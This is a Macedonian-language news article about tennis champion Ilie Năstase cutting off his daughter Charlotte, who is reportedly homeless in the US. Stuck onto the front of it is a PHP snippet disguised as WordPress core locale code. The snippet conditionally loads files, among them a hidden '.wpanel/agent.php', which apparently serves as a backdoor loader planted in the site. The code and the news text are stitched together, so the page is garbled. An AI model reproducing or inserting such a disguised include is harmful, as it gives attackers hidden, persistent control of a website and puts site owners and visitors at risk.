// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } Ќерката на тениската легенда е бездомник - Република Skip to main content

Ќерката на тениската легенда е бездомник

фото Фејсбук

Романската тениска легенда и поранешен најдобар играч во светот Илија Настасе (79) се откажа од својата ќерка Шарлот, па таа сега е бездомник.

Познатиот Романец тврди дека не е заинтересиран за нејзините проблеми.

foto Fejsbuk

Илија Настасе беше најдобар играч во светот во текот на седумдесеттите години од минатиот век, а ги освои Ролан Гарос и Отвореното првенство на САД, додека двапати беше поразен во финалето на Вимблдон.
Како што објавува романскиот Дигиспорт, Шарлот живее на улица во САД и ги користи социјалните мрежи за да бара храна и засолниште од пријателите. Поранешниот шампион на Гренд слем го прекина контактот со својата ќерка откако таа почна да објавува фотографии и содржини за возрасни на платформата OnlyFans во 2021 година.

Тој вели дека ѝ посакува добро здравје, но дека повеќе не е заинтересиран за нејзината ќерка. Додаде и дека вложил сериозни пари во нејзиното воспитување и образование.

Ѝ посакувам добро здравје, но ја молам да престане со овие скандали. Таа си оди по својот пат. Јас ѝ помогнав кога ѝ требаше, платив речиси половина милион евра за школарина. Таа сега е во САД, а јас сум во Романија, повеќе не ми е гајле. Секој си има свој живот“, рече Настасе.

Настасе владееше на АТП ранг-листата во 1973 и 1974 година. Тој е во Меѓународната тениска сала на славните од 1991 година. Тој го освои Отвореното првенство на САД во 1972 година и Отвореното првенство на Франција во 1973 година, како и три титули на Гренд слем во двојки и две титули во мешани двојки.

Поврзани вести